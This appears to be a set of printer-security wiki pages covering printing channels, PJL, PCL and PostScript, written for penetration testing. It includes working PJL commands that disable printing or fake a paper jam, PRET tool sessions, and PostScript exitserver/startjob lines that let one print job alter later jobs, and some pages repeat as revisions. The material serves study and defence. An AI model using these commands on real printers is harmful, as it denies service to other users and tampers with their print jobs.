@PJL DEFAULT JOBMEDIA=OFF

'''How to test for this attack?'''

Use [[PRET]]'s ''disable'' command in ''pjl'' mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> disable
Printing functionality: OFF

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

=== Offline mode ===

In addition, the PJL standard defines the ''OPMSG'' command which ‘prompts the printer to display a specified message and go offline’ \cite{hp1997pjl}. This can be used to simulate a paper jam as shown in below:

@PJL OPMSG DISPLAY="PAPER JAM IN ALL DOORS"

The command is supported by various printer models of different manufacturers. The device can however be easily brought to accept jobs again by manually pressing the ''online'' button on the control panel.

'''How to test for this attack?'''

Use [[PRET]]'s ''offline'' command in ''pjl'' mode:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> offline "MESSAGE TO DSIPLAY"
Warning: Taking the printer offline will prevent yourself and others
from printing or re-connecting to the device. Press CTRL+C to abort.
Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM!

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Port 9100 printing

2017-01-31T08:05:44Z

84.153.135.37:

[[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]]

Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as `the simplest, fastest, and generally the most reliable network protocol used for printers' <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]].

=== Who would put a printer on the Internet? ===

Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below:

[[File:Shodan.png|border|Printers reachable directly via the Internet]]

Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]]

----

USB drive or cable

2017-01-31T08:01:34Z

84.153.135.37:

[[File:USB-deployment-channel.png|thumb|160px|Printing over USB]]

Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities.  

'' '''Is your copy room always locked?''' ''

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]

Attack carriers

2017-01-31T08:00:26Z

84.153.135.37:

[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]]

Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible the attack [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki are targeted for the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''.

[[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]]

This fact makes it very harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below.

{| class="wikitable" style="text-align:center"
|+ Malicious print job deployment channels
|-
! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB
|-
| style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || ||
|-
| style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ || ✔ || || ✔ || ||
|-
| style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔
|-
| style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔
|-
| style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔
|-
| style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔
|-
| style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔
|-
|}

It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like cloud-based printing.

== Attacker Models ==

A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]].

→ ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]]

PJL

2017-01-31T07:52:47Z

84.153.135.37:

[[File:PJL-display.png|thumb|Classic prank: PJL display ‘hacks’]]

The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]].

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]]

------------

PCL

2017-01-31T07:51:32Z

84.153.135.37:

The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, it's origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced to by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below:

<Esc>EHello world

Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturers's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]]

----------

PDF

2017-01-31T07:50:37Z

84.153.135.37:

The Portable Document Format (PDF) has initially been released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.</ref> and later became an ISO standard <ref>''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008</ref>. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further studied in this wiki.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[PostScript]], [[PJL]]

----------

PostScript

2017-01-31T07:47:21Z

84.153.135.37: /* Operator redefinition */

The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below:

<syntaxhighlight lang=postscript>
%!
(Hello world) print
</syntaxhighlight>

While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]].

== Security features ==

=== Exiting the server loop ===

Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature:

<syntaxhighlight lang=postscript>
true 0 startjob
</syntaxhighlight>

or ''exitserver'' (available in all implementations that include a job server):

<syntaxhighlight lang=postscript>
serverdict begin 0 exitserver
</syntaxhighlight>

This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. In other words, a print job can access and alter further jobs. Bingo!

=== Operator redefinition ===

When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below:

[[File:Dictstack.png|300px|The PostScript dictionary stack]]

The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP].

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]]



-----

Fundamentals

2017-01-31T07:43:29Z

84.153.135.37: /* Page Description Languages */

Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages.

== High-level overview ==

Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below.

[[File:Protocols.png|500px|Encapsulation of printer languages]]

The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.

== Network printing protocols ==

Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface.

→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]

== Printer Control Languages ==

A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].

→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]

== Page Description Languages ==

A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]].

→ ''Related articles:'' [[PCL]], [[PostScript]]

-----------

Fundamentals

2017-01-31T07:43:20Z

84.153.135.37: /* Printer Control Languages */

Fundamentals

2017-01-31T07:43:07Z

84.153.135.37: /* Network printing protocols */

Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant <ref>Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.</ref>. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages.

== High-level overview ==

Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below.

[[File:Protocols.png|500px|Encapsulation of printer languages]]

The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.

== Network printing protocols ==

Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface.

→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]

== Printer Control Languages ==

A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].

→ ''Related aricles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]

== Page Description Languages ==

A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]].

→ ''Related aricles:'' [[PCL]], [[PostScript]]

-----------